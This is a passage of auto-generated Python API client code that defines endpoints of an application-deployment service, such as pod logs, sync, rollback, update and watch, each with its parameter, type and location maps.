'resource_name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
'patch_type': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_patch_resource
)
def __application_service_pod_logs(
self,
name,
pod_name,
**kwargs
):
"""PodLogs returns stream of log entries for the specified pod. Pod # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_pod_logs(name, pod_name, async_req=True)
>>> result = thread.get()
Args:
name (str):
pod_name (str):
Keyword Args:
namespace (str): [optional]
container (str): [optional]
since_seconds (str): [optional]
since_time_seconds (str): Represents seconds of UTC time since Unix epoch 1970-01-01T00:00:00Z. Must be from 0001-01-01T00:00:00Z to 9999-12-31T23:59:59Z inclusive.. [optional]
since_time_nanos (int): Non-negative fractions of a second at nanosecond resolution. Negative second values with fractions must still have non-negative nanos values that count forward in time. Must be from 0 to 999,999,999 inclusive. This field may be limited in precision depending on context.. [optional]
tail_lines (str): [optional]
follow (bool): [optional]
until_time (str): [optional]
filter (str): [optional]
kind (str): [optional]
group (str): [optional]
resource_name (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
StreamResultOfApplicationLogEntry
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['pod_name'] = \
pod_name
return self.call_with_http_info(**kwargs)
self.application_service_pod_logs = _Endpoint(
settings={
'response_type': (StreamResultOfApplicationLogEntry,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/pods/{podName}/logs',
'operation_id': 'application_service_pod_logs',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'pod_name',
'namespace',
'container',
'since_seconds',
'since_time_seconds',
'since_time_nanos',
'tail_lines',
'follow',
'until_time',
'filter',
'kind',
'group',
'resource_name',
],
'required': [
'name',
'pod_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'pod_name':
(str,),
'namespace':
(str,),
'container':
(str,),
'since_seconds':
(str,),
'since_time_seconds':
(str,),
'since_time_nanos':
(int,),
'tail_lines':
(str,),
'follow':
(bool,),
'until_time':
(str,),
'filter':
(str,),
'kind':
(str,),
'group':
(str,),
'resource_name':
(str,),
},
'attribute_map': {
'name': 'name',
'pod_name': 'podName',
'namespace': 'namespace',
'container': 'container',
'since_seconds': 'sinceSeconds',
'since_time_seconds': 'sinceTime.seconds',
'since_time_nanos': 'sinceTime.nanos',
'tail_lines': 'tailLines',
'follow': 'follow',
'until_time': 'untilTime',
'filter': 'filter',
'kind': 'kind',
'group': 'group',
'resource_name': 'resourceName',
},
'location_map': {
'name': 'path',
'pod_name': 'path',
'namespace': 'query',
'container': 'query',
'since_seconds': 'query',
'since_time_seconds': 'query',
'since_time_nanos': 'query',
'tail_lines': 'query',
'follow': 'query',
'until_time': 'query',
'filter': 'query',
'kind': 'query',
'group': 'query',
'resource_name': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_pod_logs
)
def __application_service_pod_logs2(
self,
name,
**kwargs
):
"""PodLogs returns stream of log entries for the specified pod. Pod # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_pod_logs2(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
namespace (str): [optional]
pod_name (str): [optional]
container (str): [optional]
since_seconds (str): [optional]
since_time_seconds (str): Represents seconds of UTC time since Unix epoch 1970-01-01T00:00:00Z. Must be from 0001-01-01T00:00:00Z to 9999-12-31T23:59:59Z inclusive.. [optional]
since_time_nanos (int): Non-negative fractions of a second at nanosecond resolution. Negative second values with fractions must still have non-negative nanos values that count forward in time. Must be from 0 to 999,999,999 inclusive. This field may be limited in precision depending on context.. [optional]
tail_lines (str): [optional]
follow (bool): [optional]
until_time (str): [optional]
filter (str): [optional]
kind (str): [optional]
group (str): [optional]
resource_name (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
StreamResultOfApplicationLogEntry
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_pod_logs2 = _Endpoint(
settings={
'response_type': (StreamResultOfApplicationLogEntry,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/logs',
'operation_id': 'application_service_pod_logs2',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'namespace',
'pod_name',
'container',
'since_seconds',
'since_time_seconds',
'since_time_nanos',
'tail_lines',
'follow',
'until_time',
'filter',
'kind',
'group',
'resource_name',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'namespace':
(str,),
'pod_name':
(str,),
'container':
(str,),
'since_seconds':
(str,),
'since_time_seconds':
(str,),
'since_time_nanos':
(int,),
'tail_lines':
(str,),
'follow':
(bool,),
'until_time':
(str,),
'filter':
(str,),
'kind':
(str,),
'group':
(str,),
'resource_name':
(str,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'pod_name': 'podName',
'container': 'container',
'since_seconds': 'sinceSeconds',
'since_time_seconds': 'sinceTime.seconds',
'since_time_nanos': 'sinceTime.nanos',
'tail_lines': 'tailLines',
'follow': 'follow',
'until_time': 'untilTime',
'filter': 'filter',
'kind': 'kind',
'group': 'group',
'resource_name': 'resourceName',
},
'location_map': {
'name': 'path',
'namespace': 'query',
'pod_name': 'query',
'container': 'query',
'since_seconds': 'query',
'since_time_seconds': 'query',
'since_time_nanos': 'query',
'tail_lines': 'query',
'follow': 'query',
'until_time': 'query',
'filter': 'query',
'kind': 'query',
'group': 'query',
'resource_name': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_pod_logs2
)
def __application_service_resource_tree(
self,
application_name,
**kwargs
):
"""ResourceTree returns resource tree # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_resource_tree(application_name, async_req=True)
>>> result = thread.get()
Args:
application_name (str):
Keyword Args:
namespace (str): [optional]
name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1ApplicationTree
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['application_name'] = \
application_name
return self.call_with_http_info(**kwargs)
self.application_service_resource_tree = _Endpoint(
settings={
'response_type': (V1alpha1ApplicationTree,),
'auth': [],
'endpoint_path': '/api/v1/applications/{applicationName}/resource-tree',
'operation_id': 'application_service_resource_tree',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'application_name',
'namespace',
'name',
'version',
'group',
'kind',
],
'required': [
'application_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'application_name':
(str,),
'namespace':
(str,),
'name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'application_name': 'applicationName',
'namespace': 'namespace',
'name': 'name',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'application_name': 'path',
'namespace': 'query',
'name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_resource_tree
)
def __application_service_revision_metadata(
self,
name,
revision,
**kwargs
):
"""Get the meta-data (author, date, tags, message) for a specific revision of the application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_revision_metadata(name, revision, async_req=True)
>>> result = thread.get()
Args:
name (str): the application's name
revision (str): the revision of the app
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1RevisionMetadata
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['revision'] = \
revision
return self.call_with_http_info(**kwargs)
self.application_service_revision_metadata = _Endpoint(
settings={
'response_type': (V1alpha1RevisionMetadata,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/revisions/{revision}/metadata',
'operation_id': 'application_service_revision_metadata',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'revision',
],
'required': [
'name',
'revision',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'revision':
(str,),
},
'attribute_map': {
'name': 'name',
'revision': 'revision',
},
'location_map': {
'name': 'path',
'revision': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_revision_metadata
)
def __application_service_rollback(
self,
name,
body,
**kwargs
):
"""Rollback syncs an application to its target state # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_rollback(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (ApplicationApplicationRollbackRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_rollback = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/rollback',
'operation_id': 'application_service_rollback',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'name',
'body',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(ApplicationApplicationRollbackRequest,),
},
'attribute_map': {
'name': 'name',
},
'location_map': {
'name': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_rollback
)
def __application_service_run_resource_action(
self,
name,
body,
**kwargs
):
"""RunResourceAction run resource action # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_run_resource_action(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (str):
Keyword Args:
namespace (str): [optional]
resource_name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool, date, datetime, dict, float, int, list, str, none_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_run_resource_action = _Endpoint(
settings={
'response_type': (bool, date, datetime, dict, float, int, list, str, none_type,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/resource/actions',
'operation_id': 'application_service_run_resource_action',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'name',
'body',
'namespace',
'resource_name',
'version',
'group',
'kind',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(str,),
'namespace':
(str,),
'resource_name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'resource_name': 'resourceName',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'name': 'path',
'body': 'body',
'namespace': 'query',
'resource_name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_run_resource_action
)
def __application_service_sync(
self,
name,
body,
**kwargs
):
"""Sync syncs an application to its target state # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_sync(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (ApplicationApplicationSyncRequest):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_sync = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/sync',
'operation_id': 'application_service_sync',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'name',
'body',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(ApplicationApplicationSyncRequest,),
},
'attribute_map': {
'name': 'name',
},
'location_map': {
'name': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_sync
)
def __application_service_terminate_operation(
self,
name,
**kwargs
):
"""TerminateOperation terminates the currently running operation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_terminate_operation(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
bool, date, datetime, dict, float, int, list, str, none_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_terminate_operation = _Endpoint(
settings={
'response_type': (bool, date, datetime, dict, float, int, list, str, none_type,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/operation',
'operation_id': 'application_service_terminate_operation',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'name',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
},
'attribute_map': {
'name': 'name',
},
'location_map': {
'name': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_terminate_operation
)
def __application_service_update(
self,
application_metadata_name,
body,
**kwargs
):
"""Update updates an application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_update(application_metadata_name, body, async_req=True)
>>> result = thread.get()
Args:
application_metadata_name (str): Name must be unique within a namespace. Is required when creating resources, although some resources may allow a client to request the generation of an appropriate name automatically. Name is primarily intended for creation idempotence and configuration definition. Cannot be updated. More info: http://kubernetes.io/docs/user-guide/identifiers#names +optional
body (V1alpha1Application):
Keyword Args:
validate (bool): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['application_metadata_name'] = \
application_metadata_name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_update = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications/{application.metadata.name}',
'operation_id': 'application_service_update',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'application_metadata_name',
'body',
'validate',
],
'required': [
'application_metadata_name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'application_metadata_name':
(str,),
'body':
(V1alpha1Application,),
'validate':
(bool,),
},
'attribute_map': {
'application_metadata_name': 'application.metadata.name',
'validate': 'validate',
},
'location_map': {
'application_metadata_name': 'path',
'body': 'body',
'validate': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_update
)
def __application_service_update_spec(
self,
name,
body,
**kwargs
):
"""UpdateSpec updates an application spec # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_update_spec(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (V1alpha1ApplicationSpec):
Keyword Args:
validate (bool): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1ApplicationSpec
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_update_spec = _Endpoint(
settings={
'response_type': (V1alpha1ApplicationSpec,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/spec',
'operation_id': 'application_service_update_spec',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'name',
'body',
'validate',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(V1alpha1ApplicationSpec,),
'validate':
(bool,),
},
'attribute_map': {
'name': 'name',
'validate': 'validate',
},
'location_map': {
'name': 'path',
'body': 'body',
'validate': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_update_spec
)
def __application_service_watch(
self,
**kwargs
):
"""Watch returns stream of application change events # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_watch(async_req=True)
>>> result = thread.get()
Keyword Args:
name (str): the application's name.. [optional]
refresh (str): forces application reconciliation if set to true.. [optional]
project ([str]): the project names to restrict returned list applications.. [optional]
resource_version (str): when specified with a watch call, shows changes that occur after that particular version of a resource.. [optional]
selector (str): the selector to to restrict returned list to applications only with matched labels.. [optional]
repo (str): the repoURL to restrict returned list applications.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
StreamResultOfV1alpha1ApplicationWatchEvent
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.application_service_watch = _Endpoint(
settings={
'response_type': (StreamResultOfV1alpha1ApplicationWatchEvent,),
'auth': [],
'endpoint_path': '/api/v1/stream/applications',
'operation_id': 'application_service_watch',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'refresh',
'project',
'resource_version',
'selector',
'repo',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'refresh':
(str,),
'project':
([str],),
'resource_version':
(str,),
'selector':
(str,),
'repo':
(str,),
},
'attribute_map': {
'name': 'name',
'refresh': 'refresh',
'project': 'project',
'resource_version': 'resourceVersion',
'selector': 'selector',
'repo': 'repo',
},
'location_map': {
'name': 'query',
'refresh': 'query',
'project': 'query',
'resource_version': 'query',
'selector': 'query',
'repo': 'query',
},
'collection_format_map': {
'project': 'multi',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_watch
)
def __application_service_watch_resource_tree(
self,
application_name,
**kwargs
):
"""Watch returns stream of application resource tree # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_watch_resource_tree(application_name, async_req=True)
>>> result = thread.get()
Args:
application_name (str):
